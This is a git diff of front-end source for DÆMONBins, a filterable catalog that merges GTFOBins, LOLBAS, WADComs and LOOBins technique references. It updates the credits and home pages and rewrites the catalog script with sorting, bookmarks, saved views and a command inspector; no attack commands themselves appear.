'Every full binary is expanded per function × example × context into individual technique rows; SUID / sudo / capabilities contexts also flag Privilege Escalation; `inherit` entries resolve their `from:` binary to union the inherited capabilities.', count: c.bySource.GTFOBins, @@ -28,14 +33,14 @@ const CREDITS = [ --- <Base title="Credits & Licenses — DÆMONBins" - description="Attribution and GPL-3.0 licensing for GTFOBins, LOLBAS and WADComs, the three projects merged into DÆMONBins, plus the DÆMON additions." + description="Attribution and GPL-3.0 licensing for GTFOBins, LOLBAS, WADComs and LOOBins, the four projects merged into DÆMONBins, plus the DÆMON additions." jsonLd={dataset(Astro.site, c, commits)} > <div class="wrap prose credits" style="max-width:60rem; padding: 2rem 0 5rem;"> <SlantTitle eyebrow="05 · Credits" title="Credits & Licenses" tone="gold" /> <p style="margin-top:2rem;"> - DÆMONBins is a merge of three public, GPL-3.0 living-off-the-land references. All three are + DÆMONBins combines four public, GPL-3.0 command references. All four are licensed under the GNU GPL-3.0, so this combined dataset and site are a single GPL-3.0 work. Every technique row shows its source, and per-tool pages link back to the upstream entry. </p> @@ -69,13 +74,14 @@ const CREDITS = [ <ul> <li><strong>Authored by:</strong> {SOURCE_META.DAEMON.author}</li> <li><strong>License:</strong> GPL-3.0 — contributed under the same license as the upstreams, keeping the collection a single GPL-3.0 work.</li> - <li><strong>Rows here:</strong> {c.added} (badged <span class="tag-new">NEW</span>, filterable under Source = DÆMON)</li> + <li><strong>Rows here:</strong> {c.added} (labelled <span class="tag-new">DÆMON</span>, filterable under Source = DÆMON; authorship does not indicate recency)</li> <li><strong>Provenance rule:</strong> the 134 Windows/AD additions were transcribed and fact-checked; the modernization backlog documents only real, publicly-referenced commands, each with a canonical source. No fabricated commands.</li> </ul> </div> </section> <h2>This site</h2> + <p>GTFOBins commands carry Linux compatibility until their exact macOS syntax and context are checked. Native macOS references come from LOOBins. “Documentation checked” means the cited documentation was reviewed; “Upstream reference” means imported reference material. Neither label claims a successful lab run.</p> <p> Built with <a href="https://astro.build" target="_blank" rel="noopener">Astro</a> and <a href="https://pagefind.app" target="_blank" rel="noopener">Pagefind</a>, themed with diff --git a/src/pages/index.astro b/src/pages/index.astro @@ -14,7 +14,8 @@ const marqueeTitles = [ { n: 'NIX', title: 'GTFOBins', accent: 'foam' }, { n: 'WIN', title: 'LOLBAS', accent: 'iris' }, { n: 'AD', title: 'WADComs', accent: 'gold' }, - { n: 'NEW', title: 'DÆMON', accent: 'love' }, + { n: 'MAC', title: 'LOOBins', accent: 'rose' }, + { n: 'DMN', title: 'DÆMON', accent: 'love' }, { n: '01', title: 'SUID · sudo', accent: 'gold' }, { n: '02', title: 'AWL Bypass', accent: 'iris' }, { n: '03', title: 'ADCS · ESC', accent: 'gold' }, @@ -37,7 +38,7 @@ const platformStats = PLATFORMS.filter((p) => c.byPlatform[p]).map((p) => ({ --- <Base title="DÆMONBins — the Off-the-Land Almanac" - description="One filterable catalog merging GTFOBins, LOLBAS and WADComs — plus DÆMON's fact-checked modern additions. Living-off-the-land and offensive techniques by platform, capability and source." + description="One filterable catalog merging GTFOBins, LOLBAS, WADComs and LOOBins — plus DÆMON additions. Living-off-the-land and offensive techniques by platform, access, environment and evidence state." jsonLd={[website(Astro.site), dataset(Astro.site, c, facets.commits)]} > <HeroDeck /> @@ -65,7 +66,7 @@ const platformStats = PLATFORMS.filter((p) => c.byPlatform[p]).map((p) => ({ <h2 class="eyebrow" style="--acc: var(--iris);"> <span class="eyebrow__n">02</span> <span class="eyebrow__mark">^:</span> - <span>The four decks</span> + <span>The collections</span> <span class="eyebrow__rule" aria-hidden="true"></span> </h2> <div class="home-sources__grid"> @@ -93,7 +94,7 @@ const platformStats = PLATFORMS.filter((p) => c.byPlatform[p]).map((p) => ({ MITRE ATT&CK. For authorized testing, CTFs, detection engineering and education only. Know your scope. </Callout> <p class="home-scope__cred"> - GTFOBins, LOLBAS and WADComs are each GPL-3.0; this merged work is GPL-3.0. See <a href={url('credits')}>credits &amp; licenses</a>. + GTFOBins, LOLBAS, WADComs and LOOBins are GPL-3.0 projects; this merged work is GPL-3.0. See <a href={url('credits')}>credits &amp; licenses</a>. </p> </section> </Base> @@ -140,7 +141,7 @@ const platformStats = PLATFORMS.filter((p) => c.byPlatform[p]).map((p) => ({ color: var(--fg-faint); } - /* ---- The four decks ----------------------------------------------------- */ + /* ---- The collections ---------------------------------------------------- */ .home-sources { margin: clamp(2.6rem, 5vw, 4rem) auto 0; } .home-sources__grid { display: grid; diff --git a/src/scripts/catalog.ts b/src/scripts/catalog.ts @@ -1,191 +1,184 @@ -// The catalog island — a framework-free client filter over the technique -// index. The first page and the facet rail are server-rendered by -// catalog.astro with the same renderers (src/lib/render-row.ts), so on a plain -// load the island adopts that markup and only fetches the slim list index -// (public/data/index-<hash>.json) to power filtering. -// -// History policy: a facet toggle, NEW, Clear are *intents* and push a history -// entry (Back undoes them one at a time); keystrokes in the search box replace -// the current entry so typing never spams the stack. `popstate` re-reads the -// URL, so deep links, Back and Forward all go through one path. - -import { - filtersFromSearch, filtersToSearch, filterTechniques, countActive, isEmpty, - EMPTY_FILTERS, type Technique, type CatalogFilters, -} from '../lib/techniques'; -import { - PAGE, renderFacets, renderRow, haystack, countLabel, moreLabel, EMPTY_HTML, - type ListTechnique, type FacetCounts, -} from '../lib/render-row'; +import { filtersFromSearch, filtersToSearch, filterTechniques, countActive, EMPTY_FILTERS, FACET_KEYS, toolRoute, type Technique, type CatalogFilters, type FacetKey } from '../lib/techniques'; +import { PAGE, renderRow, countLabel, EMPTY_HTML } from '../lib/render-row'; +import { sortTechniques, groupTechniques, contextualCounts, configureCommand, type SortOrder } from '../lib/catalog-workspace'; +import { escapeHtml as esc, highlightCommand } from '../lib/highlight'; import { url } from '../lib/url'; -import './copy'; // delegated [data-copy] handler; rows carry [data-cmdbar] - -function init(root: HTMLElement, all: ListTechnique[]) { - const facetsEl = root.querySelector('[data-cat-facets]') as HTMLElement; - const resultsEl = root.querySelector('[data-cat-results]') as HTMLElement; - const countEl = root.querySelector('[data-cat-count]') as HTMLElement; - const searchEl = root.querySelector('[data-cat-search]') as HTMLInputElement; - const newEl = root.querySelector('[data-cat-new]') as HTMLButtonElement; - const clearEl = root.querySelector('[data-cat-clear]') as HTMLButtonElement; - const moreEl = root.querySelector('[data-cat-more]') as HTMLButtonElement; +import './copy'; - const counts: FacetCounts = { platform: {}, capability: {}, source: {} }; - const hay = new Map<string, string>(); - for (const t of all) { - for (const p of t.platform) counts.platform[p] = (counts.platform[p] || 0) + 1; - for (const c of t.capability) counts.capability[c] = (counts.capability[c] || 0) + 1; - counts.source[t.source] = (counts.source[t.source] || 0) + 1; - hay.set(t.id, haystack(t)); - } +function readStore<T>(key: string, fallback: T): T { try { return JSON.parse(localStorage.getItem(key) || 'null') ?? fallback; } catch { return fallback; } } - const path = location.pathname; +function init(root: HTMLElement, all: Technique[]) { + const $ = <T extends HTMLElement = HTMLElement>(s: string) => root.querySelector<T>(s)!; + const list = $('[data-cat-results]'), rail = $('[data-cat-facets]'), panel = $('#catalog-inspector'); + const search = $<HTMLInputElement>('[data-cat-search]'), sort = $<HTMLSelectElement>('[data-sort]'), group = $<HTMLInputElement>('[data-group]'); + const status = $('[data-workspace-status]'); + const byId = new Map(all.map(t => [t.id, t])); let filters: CatalogFilters = filtersFromSearch(location.search); - let limit = PAGE; - let results: ListTechnique[] = []; - let rendered = 0; // rows currently in the DOM - - // Chips are built once (or adopted from the server); the chip counts are - // dataset totals, not contextual, so nothing about them changes when a - // filter flips. Toggling state in place (rather than rebuilding innerHTML) - // is what keeps keyboard focus on the chip that was just activated. - function syncControls() { - facetsEl.querySelectorAll<HTMLElement>('[data-facet]').forEach((btn) => { - const kind = btn.dataset.facet as 'platform' | 'capability' | 'source'; - btn.setAttribute('aria-checked', String(filters[kind].includes(btn.dataset.value || ''))); - }); - newEl.setAttribute('aria-pressed', String(filters.addedOnly)); - if (searchEl.value !== filters.query) searchEl.value = filters.query; + const storedBookmarks = readStore<unknown>('daemonbins:saved', []); + const bookmarks = new Set<string>(Array.isArray(storedBookmarks) ? storedBookmarks.filter(id => typeof id === 'string' && byId.has(id)) : []); + const storedViews = readStore<unknown>('daemonbins:views', []); + let views: { name: string; query: string }[] = Array.isArray(storedViews) ? storedViews.filter(v => v && typeof v.name === 'string' && typeof v.query === 'string').slice(0, 20) : []; + let savedOnly = false, selected = '', limit = PAGE; + let groups: Technique[][] = []; + let opener: HTMLElement | null = null; + let debounce: ReturnType<typeof setTimeout>; + const save = (key: string, value: unknown) => { try { localStorage.setItem(key, JSON.stringify(value)); return true; } catch { status.textContent = 'Browser storage is unavailable. Changes last for this visit only.'; return false; } }; + function readURL() { + filters = filtersFromSearch(location.search); + const p = new URLSearchParams(location.search); + sort.value = ['tool', 'source', 'reviewed'].includes(p.get('sort') || '') ? p.get('sort')! : 'tool'; + group.checked = p.get('group') !== '0'; savedOnly = p.get('saved') === '1'; selected = p.get('id') || ''; } - - function compute(): ListTechnique[] { - const base = filterTechniques(all as Technique[], { ...filters, query: '' }); - const q = filters.query.trim().toLowerCase(); - return q ? base.filter((t) => (hay.get(t.id) || '').includes(q)) : base; + function query() { + const p = new URLSearchParams(filtersToSearch(filters)); + if (sort.value !== 'tool') p.set('sort', sort.value); + if (!group.checked) p.set('group', '0'); + if (savedOnly) p.set('saved', '1'); + if (selected) p.set('id', selected); + return p.toString(); } - - function updateMeta() { - countEl.innerHTML = countLabel(results.length, all.length, countActive(filters), filters.addedOnly); - const remaining = results.length - rendered; - moreEl.hidden = remaining <= 0; - if (remaining > 0) moreEl.textContent = moreLabel(remaining); + function sync(push: boolean) { + const next = location.pathname + (query() ? `?${query()}` : ''); + if (next !== location.pathname + location.search) history[push ? 'pushState' : 'replaceState']({}, '', next); } - - /** Full re-render: recompute, replace the list. Collapses open rows — a filter changed. */ - function render() { - results = compute(); - const visible = results.slice(0, limit); - resultsEl.innerHTML = visible.map(renderRow).join('') || EMPTY_HTML; - rendered = visible.length; - updateMeta(); + function syncBookmarks() { + $('[data-bookmark-count]').textContent = String(bookmarks.size); + root.querySelectorAll<HTMLButtonElement>('[data-save]').forEach(b => { + const id = b.closest<HTMLElement>('[data-id]')?.dataset.id; + const active = !!id && bookmarks.has(id); b.setAttribute('aria-pressed', String(active)); b.textContent = active ? 'Saved' : 'Save'; + }); } - /** "Show more": append the next page only, so rows already open stay open. */ - function renderMore() { - const from = rendered; - limit = from + PAGE; - const next = results.slice(from, limit); - resultsEl.insertAdjacentHTML('beforeend', next.map(renderRow).join('')); - rendered += next.length; - updateMeta(); + function updateCounts() { + const base = savedOnly ? all.filter(t => bookmarks.has(t.id)) : all; + const counts = contextualCounts(base, filters); + rail.querySelectorAll<HTMLButtonElement>('[data-facet]').forEach(b => { + const k = b.dataset.facet as FacetKey, value = b.dataset.value!; + const active = filters[k]?.includes(value) || false; + b.setAttribute('aria-checked', String(active)); + b.querySelector('.cat-chip__n')!.textContent = String(counts[k][value] || 0); + b.disabled = !active && !counts[k][value]; + }); } - - function sync(push: boolean) { - const qs = filtersToSearch(filters); - const next = path + (qs ? `?${qs}` : ''); - if (next === location.pathname + location.search) return; - if (push) history.pushState({ catalog: true }, '', next); - else history.replaceState(history.state, '', next); + function render(append = false) { + const matching = sortTechniques(filterTechniques(savedOnly ? all.filter(t => bookmarks.has(t.id)) : all, filters), sort.value as SortOrder, filters.query); + groups = group.checked ? groupTechniques(matching) : matching.map(t => [t]); + const start = append ? Math.max(0, limit - PAGE) : 0; + const html = groups.slice(start, limit).map(g => renderRow(g[0], g)).join(''); + if (append) list.insertAdjacentHTML('beforeend', html); else list.innerHTML = html || EMPTY_HTML; + $('[data-cat-count]').innerHTML = countLabel(matching.length, all.length, countActive(filters), filters.addedOnly) + (group.checked ? ` · ${groups.length} tool${groups.length === 1 ? '' : 's'}` : ''); + const more = $<HTMLButtonElement>('[data-cat-more]'); more.hidden = groups.length <= limit; + more.textContent = `Show ${Math.min(PAGE, Math.max(0, groups.length - limit))} more ${group.checked ? 'tools' : 'techniques'}`; + search.value = filters.query; + $('[data-cat-new]').setAttribute('aria-pressed', String(filters.addedOnly)); + $('[data-bookmarks-only]').setAttribute('aria-pressed', String(savedOnly)); + $('[data-active-filters]').innerHTML = FACET_KEYS.flatMap(k => (filters[k] || []).map(v => `<button type="button" data-remove="${k}" data-value="${esc(v)}" aria-label="Remove ${esc(k)} filter ${esc(v)}">${esc(v)} ×</button>`)).join(''); + syncBookmarks(); updateCounts(); } - - function apply(next: CatalogFilters, push = true) { - filters = next; - limit = PAGE; - sync(push); - syncControls(); - render(); + const paragraph = (title: string, value?: string) => value ? `<h3>${esc(title)}</h3><p>${esc(value)}</p>` : ''; + function inspect(id: string, focus = false) { + const t = byId.get(id); selected = t ? id : ''; + if (!t) { panel.hidden = true; return; } + panel.hidden = false; panel.dataset.id = id; + panel.innerHTML = `<div class="inspector__top"><span class="eyebrow">${esc(t.source)}</span><button data-close-inspector type="button" aria-label="Close technique details">Close ×</button></div> + <h2 tabindex="-1">${esc(t.toolName)}</h2><p>${esc(t.name || t.capability.join(', '))}</p> + <p>${esc(t.verification || 'Upstream reference')}${t.reviewedAt ? ` · reviewed ${esc(t.reviewedAt)}` : ''}</p> + ${paragraph('About this command', t.description)} + ${t.template ? `<h3>Configure command</h3><p>${t.template.shell === 'posix' ? 'POSIX shell' : 'PowerShell'} quoting. Values stay in this panel and are not saved or added to the URL.</p><form class="command-fields">${t.template.variables.map(v => `<label>${esc(v.label)}<input data-variable="${esc(v.key)}" value="${esc(v.default)}" autocomplete="off" spellcheck="false" /></label>`).join('')}</form><p class="template-error" role="status"></p>` : ''} + <div data-cmdbar><pre><code data-preview>${highlightCommand(t.command)}</code></pre><button data-copy type="button">Copy command</button> <button data-save type="button">Save</button></div> + ${paragraph('Required access', t.requires?.join(', '))}${paragraph('Execution context', t.context || t.privilege)} + ${paragraph('Environment', t.environment?.join(', '))}${paragraph('Services', t.services?.join(', '))} + ${paragraph('Compatibility', t.compatibility)}${paragraph('Expected result', t.expected)}${paragraph('Troubleshooting', t.troubleshooting)}${paragraph('Side effects', t.sideEffects)}${paragraph('Restore', t.restore)} + ${t.mitre.length ? `<h3>ATT&CK</h3><p>${t.mitre.map(m => `<a href="https://attack.mitre.org/techniques/${esc(m.replace('.', '/'))}/" target="_blank" rel="noopener">${esc(m)}</a>`).join(' · ')}</p>` : ''} + ${t.detection?.length ? `<h3>Detection references</h3><ul>${t.detection.map(d => `<li>${esc(d.type)}: ${/^https?:\/\//.test(d.value) ? `<a href="${esc(d.value)}" target="_blank" rel="noopener">Source</a>` : esc(d.value)}</li>`).join('')}</ul>` : ''} + <h3>Sources</h3><ul>${t.references.map((r, i) => `<li><a href="${esc(r)}" target="_blank" rel="noopener">${esc(new URL(r).hostname)} · reference ${i + 1}</a></li>`).join('')}</ul><p><a href="${url(toolRoute(t.toolId))}#${esc(t.id)}">Open full tool reference →</a></p>`; + panel.querySelector('form')?.addEventListener('submit', e => e.preventDefault()); + panel.querySelector('form')?.addEventListener('input', () => { + try { + const values = Object.fromEntries([...panel.querySelectorAll<HTMLInputElement>('[data-variable]')].map(el => [el.dataset.variable!, el.value])); + panel.querySelector('[data-preview]')!.innerHTML = highlightCommand(configureCommand(t.template!, values)); + panel.querySelector('.template-error')!.textContent = ''; + panel.querySelector<HTMLButtonElement>('[data-copy]')!.disabled = false; + } catch (e) { + panel.querySelector('.template-error')!.textContent = (e as Error).message; + panel.querySelector<HTMLButtonElement>('[data-copy]')!.disabled = true; + } + }); + syncBookmarks(); + if (focus) { panel.querySelector<HTMLElement>('h2')!.focus(); if (matchMedia('(max-width:1200px)').matches) panel.scrollIntoView({ block: 'start' }); } } - - facetsEl.addEventListener('click', (e) => { - const btn = (e.target as HTMLElement).closest('[data-facet]') as HTMLElement | null; - if (!btn) return; - const kind = btn.dataset.facet as 'platform' | 'capability' | 'source'; - const value = btn.dataset.value!; - const set = new Set(filters[kind]); - set.has(value) ? set.delete(value) : set.add(value); - apply({ ...filters, [kind]: [...set] }); + function apply(push = true) { clearTimeout(debounce); limit = PAGE; sync(push); render(); } + root.addEventListener('click', e => { + const b = (e.target as HTMLElement).closest<HTMLElement>('button'); if (!b) return; + if (b.hasAttribute('data-facet') || b.hasAttribute('data-remove')) { + const k = (b.dataset.facet || b.dataset.remove) as FacetKey, value = b.dataset.value!; + const values = new Set(filters[k] || []); values.has(value) ? values.delete(value) : values.add(value); filters = { ...filters, [k]: [...values] }; apply(); + } else if (b.hasAttribute('data-cat-clear')) { filters = { ...EMPTY_FILTERS }; savedOnly = false; selected = ''; inspect(''); apply(); } + else if (b.hasAttribute('data-cat-new')) { filters = { ...filters, addedOnly: !filters.addedOnly }; apply(); } + else if (b.hasAttribute('data-bookmarks-only')) { savedOnly = !savedOnly; apply(); } + else if (b.hasAttribute('data-cat-more')) { limit += PAGE; render(true); } + else if (b.hasAttribute('data-filters-toggle')) { const open = root.dataset.filtersOpen !== 'true'; root.dataset.filtersOpen = String(open); b.setAttribute('aria-expanded', String(open)); } + else if (b.hasAttribute('data-inspect')) { opener = b; inspect(b.closest<HTMLElement>('[data-id]')!.dataset.id!, true); sync(true); } + else if (b.hasAttribute('data-close-inspector')) { inspect(''); sync(true); if (opener?.isConnected) opener.focus(); else search.focus(); } + else if (b.hasAttribute('data-save')) { + const id = b.closest<HTMLElement>('[data-id]')!.dataset.id!; bookmarks.has(id) ? bookmarks.delete(id) : bookmarks.add(id); + save('daemonbins:saved', [...bookmarks]); if (savedOnly) render(); else syncBookmarks(); + } }); - - let debounce: ReturnType<typeof setTimeout>; - searchEl.addEventListener('input', () => { - clearTimeout(debounce); - debounce = setTimeout(() => apply({ ...filters, query: searchEl.value }, false), 130); + list.addEventListener('change', e => { + const el = e.target as HTMLSelectElement; if (!el.matches('[data-variant]')) return; + const t = byId.get(el.value)!; const variants = groups.find(g => g[0].toolId === t.toolId)!; + const row = el.closest('.trow')!; row.outerHTML = renderRow(t, variants); syncBookmarks(); + [...list.querySelectorAll<HTMLElement>('[data-id]')].find(r => r.dataset.id === t.id)?.querySelector<HTMLSelectElement>('select')?.focus(); + if (selected && byId.get(selected)?.toolId === t.toolId) { inspect(t.id); sync(false); } }); - - newEl.addEventListener('click', () => apply({ ...filters, addedOnly: !filters.addedOnly })); - clearEl.addEventListener('click', () => apply({ ...EMPTY_FILTERS })); - moreEl.addEventListener('click', renderMore); - - // Back / Forward (and a deep link pasted over this one) re-read the URL. - const onPop = () => { - if (!root.isConnected || location.pathname !== path) return; - filters = filtersFromSearch(location.search); - limit = PAGE; - syncControls(); - render(); - }; - window.addEventListener('popstate', onPop); - document.addEventListener('astro:before-swap', () => window.removeEventListener('popstate', onPop), { once: true }); - - // Expand / collapse (event delegation on the results list). Copy is handled - // by the delegated [data-copy] listener in copy.ts. - resultsEl.addEventListener('click', (e) => { - const target = e.target as HTMLElement; - if (target.closest('[data-copy]')) return; - if (target.closest('.trow__tool')) return; // let the tool link navigate - const head = target.closest('.trow__head') as HTMLElement | null; - if (!head) return; - const row = head.closest('.trow') as HTMLElement; - const detail = row.querySelector('.trow__detail') as HTMLElement; - const open = detail.hidden; - detail.hidden = !open; - head.setAttribute('aria-expanded', String(open)); - row.classList.toggle('trow--open', open); + search.addEventListener('input', () => { clearTimeout(debounce); debounce = setTimeout(() => { filters = { ...filters, query: search.value }; apply(false); }, 130); }); + sort.addEventListener('change', () => apply()); group.addEventListener('change', () => apply()); + function viewsMenu() { + $<HTMLSelectElement>('[data-views]').innerHTML = '<option value="">Choose a saved view</option>' + views.map((v, i) => `<option value="${i}">${esc(v.name)}</option>`).join(''); + $('[data-delete-view]').hidden = true; + } + $('[data-save-view]').addEventListener('click', () => { + const name = window.prompt('Name this view', filters.query || 'My catalog view'); if (!name?.trim()) return; + const p = new URLSearchParams(query()); p.delete('id'); + views = [...views.filter(v => v.name !== name.trim()), { name: name.trim().slice(0, 80), query: p.toString() }].slice(-20); + const persisted = save('daemonbins:views', views); viewsMenu(); if (persisted) status.textContent = 'View saved in this browser.'; }); - - // Adopt the server-rendered rail and first page when the URL carries no - // filters: the markup came from the same renderers over the same data, so - // re-rendering would only flash. Anything else (a deep link) renders fresh. - if (facetsEl.dataset.ssr === undefined) facetsEl.innerHTML = renderFacets(filters, counts); - syncControls(); - if (resultsEl.dataset.ssr !== undefined && isEmpty(filters)) { - results = compute(); - rendered = resultsEl.querySelectorAll('.trow').length; - updateMeta(); - } else { - render(); + $('[data-views]').addEventListener('change', e => { + const val = (e.target as HTMLSelectElement).value; $('[data-delete-view]').hidden = val === ''; if (val === '') return; + history.pushState({}, '', location.pathname + '?' + views[Number(val)].query); readURL(); limit = PAGE; render(); inspect(selected); + }); + $('[data-delete-view]').addEventListener('click', () => { + const index = $<HTMLSelectElement>('[data-views]').value; if (index === '') return; + views.splice(Number(index), 1); save('daemonbins:views', views); viewsMenu(); + }); + const prefs = readStore<Record<string, unknown>>('daemonbins:display', {}); + function display() { + root.dataset.density = $<HTMLSelectElement>('[data-density]').value; + root.dataset.wrap = String($<HTMLInputElement>('[data-wrap]').checked); + root.style.setProperty('--command-size', $<HTMLSelectElement>('[data-font]').value + 'px'); + document.documentElement.dataset.motion = $<HTMLInputElement>('[data-motion]').checked ? 'reduce' : 'system'; + } + for (const name of ['density', 'font', 'wrap', 'motion']) { + const el = $<HTMLInputElement | HTMLSelectElement>(`[data-${name}]`); + if (el instanceof HTMLInputElement) el.checked = prefs[name] === true; + else if ([...el.options].some(o => o.value === prefs[name])) el.value = String(prefs[name]); + el.addEventListener('change', () => { prefs[name] = el instanceof HTMLInputElement ? el.checked : el.value; save('daemonbins:display', prefs); display(); }); } - delete facetsEl.dataset.ssr; - delete resultsEl.dataset.ssr; + const onPop = () => { clearTimeout(debounce); readURL(); limit = PAGE; render(); inspect(selected); }; + window.addEventListener('popstate', onPop); + document.addEventListener('astro:before-swap', () => { clearTimeout(debounce); window.removeEventListener('popstate', onPop); }, { once: true }); + readURL(); display(); viewsMenu(); render(); inspect(selected); } async function boot() { - const root = document.querySelector('[data-catalog]') as HTMLElement | null; - if (!root) return; - // ClientRouter fires astro:page-load on the initial load too, while the - // module's own boot() has already run — guard against double-init on the - // same element (a fresh element after a view-transition swap re-inits). - if (root.dataset.booted) return; + const root = document.querySelector<HTMLElement>('[data-catalog]'); if (!root || root.dataset.booted) return; root.dataset.booted = '1'; try { - const res = await fetch(root.dataset.indexUrl || url('data/techniques.json')); - if (!res.ok) throw new Error(`${res.status} ${res.statusText}`); - const data = (await res.json()) as ListTechnique[]; - init(root, data); + const res = await fetch(root.dataset.indexUrl!); if (!res.ok) throw new Error(String(res.status)); + const data = await res.json(); if (root.isConnected) init(root, data); } catch (e) { - const count = root.querySelector('[data-cat-count]'); - if (count) count.innerHTML = `Could not load the index — filtering is unavailable. <code>npm run build:index</code> then rebuild.`; + root.querySelector('[data-workspace-status]')!.textContent = 'Interactive catalog could not load. Reload to retry, or follow a tool link for its static reference.'; console.error('[catalog]', e); } } - -boot(); -document.addEventListener('astro:page-load', boot); +boot(); document.addEventListener('astro:page-load', boot); diff --git a/src/scripts/fuzz.ts b/src/scripts/fuzz.ts @@ -157,7 +157,7 @@ export function initFuzz(): void { canvases.forEach((cv) => { cv.dataset.bound = '1'; const amt = Math.max(0.2, PRESS / 5); - const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches; + const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches || document.documentElement.dataset.motion === 'reduce'; let pal = readPalette(cv); @@ -173,7 +173,7 @@ export function initFuzz(): void { let raf = 0; if (!reduced) { const loop = (now: number) => { - frame(cv, (now / 9000) % 1, amt, pal); + if (!document.hidden && document.documentElement.dataset.motion !== 'reduce') frame(cv, (now / 9000) % 1, amt, pal); raf = requestAnimationFrame(loop); }; raf = requestAnimationFrame(loop); diff --git a/src/scripts/hero.ts b/src/scripts/hero.ts @@ -1,4 +1,4 @@ -// The home hero controller — the deck ledger lights each of the four decks in +// The home hero controller — the collection ledger lights each collection in // turn on a loop. Point at a deck (or tab to it) and it takes the loop over; // leave and the loop resumes. The stat counters are rolled up separately by // initCounters() in app.ts (shared with the platform stats below the fold). @@ -13,7 +13,7 @@ export function initHero(): void { if (!hero || hero.dataset.heroBound) return; hero.dataset.heroBound = '1'; - const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches; + const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches || document.documentElement.dataset.motion === 'reduce'; const rows = Array.from(hero.querySelectorAll<HTMLElement>('[data-hero-row]')); const blurbEl = hero.querySelector<HTMLElement>('[data-hero-blurb]'); if (!rows.length) return; diff --git a/src/styles/workspace.css b/src/styles/workspace.css @@ -0,0 +1,41 @@ +.workbench { padding-block:2rem 4rem; --command-size:13px; } +.workbench__heading { display:flex; align-items:center; justify-content:space-between; gap:2rem; margin-bottom:1.6rem; } +.workbench__heading .eyebrow { color:var(--rose); font-size:11px; margin:0 0 .6rem; } +.workbench__heading h1 { font-family:var(--font-archivo); font-size:clamp(1.8rem,3vw,2.7rem); letter-spacing:-.04em; line-height:1.1; margin:0; text-transform:none; } +.workbench__heading h1 span { color:var(--love); } +.workbench__heading p:last-child { color:var(--fg-dim); margin:.6rem 0 0; font-size:14px; } +.workbench__stats { font-family:var(--font-mono); font-size:12px; color:var(--fg-dim); white-space:nowrap; }.workbench__stats strong { color:var(--fg); }.workbench__stats span { color:var(--rose); margin:0 .5rem; } +.workbench__search { display:flex; align-items:center; border:1px solid var(--rule-hi,var(--rule)); background:var(--surface); padding:.4rem .7rem; gap:.7rem; } +.workbench__search:focus-within { outline:2px solid var(--foam); outline-offset:2px; }.workbench__search>span { font-size:25px; color:var(--foam); } +.workbench__search input { flex:1; min-width:0; background:transparent; border:0; color:var(--fg); font-size:16px; padding:.5rem 0; outline:none; } +.workbench button,.workbench select,.workbench summary { font-family:var(--font-mono); font-size:12px; } +.workbench button,.workbench select { color:var(--fg); background:var(--surface); border:1px solid var(--rule); padding:.45rem .65rem; border-radius:3px; } +.workbench button { cursor:pointer; }.workbench button:hover { border-color:var(--foam); }.workbench button:disabled { opacity:.45; cursor:default; } +.workbench button[aria-pressed=true] { border-color:var(--rose); color:var(--rose); background:var(--wash); } +.workbench :is(button,select,summary,a,input):focus-visible { outline:2px solid var(--foam); outline-offset:3px; } +.workbench__toolbar { display:flex; gap:.5rem .8rem; align-items:center; flex-wrap:wrap; padding:.8rem 0; border-bottom:1px solid var(--rule); } +.workbench__toolbar label { font-size:12px; color:var(--fg-dim); display:flex; align-items:center; gap:.45rem; } +.workbench__toolbar [data-filters-toggle] { display:none; }.display-options { position:relative; }.display-options summary { cursor:pointer; padding:.5rem; } +.display-options>div { position:absolute; z-index:10; background:var(--bg); border:1px solid var(--rule); padding:1rem; min-width:230px; box-shadow:0 8px 24px #0003; display:grid; gap:.8rem; right:0; } +.active-filters { display:flex; gap:.5rem; flex-wrap:wrap; }.active-filters:not(:empty) { padding-top:.8rem; }.active-filters button { color:var(--foam); } +.workbench__status { color:var(--fg-dim); font-size:12px; margin:.5rem 0; min-height:1em; } +.workbench__body { display:grid; grid-template-columns:220px minmax(0,1fr); border-top:1px solid var(--rule); align-items:start; } +.workbench__body:has(.inspector:not([hidden])) { grid-template-columns:210px minmax(280px,1fr) minmax(320px,.9fr); } +.workbench__filters { position:sticky; top:5rem; max-height:calc(100dvh - 5rem); overflow-y:auto; border-right:1px solid var(--rule); padding:1rem 1rem 2rem 0; } +.filter-heading { margin-bottom:1.2rem; }.filter-heading h2 { font-size:14px; margin:0 0 .4rem; }.filter-heading span { font-size:10px; color:var(--fg-dim); } +.workbench .cat-facet__head { font-size:11px; letter-spacing:.03em; }.workbench .cat-chip { font-size:12px; padding:.4rem .5rem; border-radius:3px; }.workbench .cat-chip__n { font-size:11px; }.workbench .cat-facet { margin-bottom:1.4rem; } +.workbench__results { min-width:0; padding:0 0 0 1.2rem; }.workbench__result-heading { display:flex; align-items:center; justify-content:space-between; gap:1rem; min-height:3.2rem; } +.workbench__result-heading p { font-size:12px; color:var(--fg-dim); margin:0; }.workbench__result-heading>span { font:10px var(--font-mono); color:var(--fg-faint); } +.workbench .trow__head { cursor:default; padding:1rem .9rem .6rem; grid-template-columns:28px minmax(0,1fr) auto; }.workbench .trow__head:hover { background:transparent; } +.workbench .trow__inspect { padding:.1rem; width:28px; height:28px; color:var(--foam); }.workbench .trow__tool { font-size:16px; }.workbench .tbadge { font-size:10px; letter-spacing:.02em; } +.workbench .trow__sub { font-size:12px; color:var(--fg-dim); }.workbench .trow__badges { max-width:220px; }.workbench .trow__badges .tbadge:not(.tbadge--src):not(.tbadge--new) { display:none; } +.trow__variants { display:flex; gap:.5rem; align-items:center; font:11px var(--font-mono); color:var(--fg-dim); padding:0 .9rem .6rem; }.trow__variants select { flex:1; min-width:0; width:100%; } +.workbench .trow__cmd { font-size:var(--command-size); }.trow__actions { display:flex; align-items:center; gap:.5rem; padding:0 .9rem .8rem; }.trow__actions>span { flex:1; color:var(--fg-dim); font:11px var(--font-mono); } +.workbench[data-density=compact] .trow__head { padding-top:.5rem; }.workbench[data-density=compact] .trow__cmd { padding:.35rem .6rem; }.workbench[data-wrap=true] pre code { white-space:pre-wrap; overflow-wrap:anywhere; } +.workbench .cat__more { display:block; margin:1.2rem auto; }.workbench .cat__more[hidden] { display:none; } +.inspector { position:sticky; top:5rem; max-height:calc(100dvh - 5rem); overflow:auto; margin-left:1rem; padding:1.1rem; border-left:1px solid var(--rule); background:var(--surface); } +.inspector[hidden] { display:none; }.inspector__top { display:flex; justify-content:space-between; gap:1rem; align-items:center; }.inspector h2 { font-family:var(--font-archivo); font-size:23px; margin:.8rem 0; }.inspector h3 { 